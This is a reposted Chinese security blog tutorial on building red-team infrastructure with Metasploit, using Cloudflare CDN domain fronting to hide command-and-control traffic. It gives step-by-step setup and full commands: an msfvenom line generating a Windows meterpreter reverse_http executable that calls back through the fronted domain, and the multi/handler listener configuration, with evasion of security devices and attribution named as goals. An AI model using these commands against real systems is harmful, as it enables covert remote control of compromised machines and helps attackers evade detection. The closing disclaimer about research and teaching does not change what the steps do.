本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:asj-jacky
加入安世加 交流群 和大佬们一起交流安全技术
0x01 前言
停更了一小段时间,去备战月考了!这几天看了一篇关于Metasploit文章,发现好多红队基础设施建设
都是关于CobaltStrike 其实Metasploit
也可以域前置
0x02 概括
-
攻击流量通过CDN节点将流量转发到真实的C2服务器 -
CDN节点ip通过识别请求的Host头进行流量转 -
可以有效的躲避一些安全设备,也有这一定的反溯源功能,因为流量都去了CDN上
0x03 准备
域名申请地址:https://www.godaddy.com/
我自己是用这个平台注册的,但是是需要付费的
免费CDN
申请地址:https://dash.cloudflare.com/
登陆CDN,添加站点为刚刚申请的域名
添加A记录,指向VPS的IP地址
配置好后,返回cdn平台 为了实时受到我们的命令的响应:我们需要修改缓存规则:
0x04 域前置
msfvenom -p windows/meterpreter/reverse_http LHOST=服务器IP LPORT=80 HttpHostHeader=域名 -f exe -o ~/payload.exe
LHOST: VPS上架一个Metasploit然后输入VPS的IP地址
LPORT: http 协议的 payload,访问域名的 80 端口
HttpHostHeader: 使用我们进行域前置攻击的域名,能够把流量转回到我们自己的服务器
Metasploit监听器
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST VPS IP
lhost => VPS IP
msf5 exploit(multi/handler) > set LPORT 80
lport => 80
msf5 exploit(multi/handler) > set HttpHostHeader 域名
HttpHostHeader => 域名
msf5 exploit(multi/handler) > set OverrideRequestHost true
OverrideRequestHost => true
msf5 exploit(multi/handler) > set ReverseListenerBindAddress 127.0.0.1
ReverseListenerBindAddress => 127.0.0.1
msf5 exploit(multi/handler) > run
0x05 效果
原文始发于微信公众号(安世加):技术干货 | Metasploit 红队基础设施建设
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论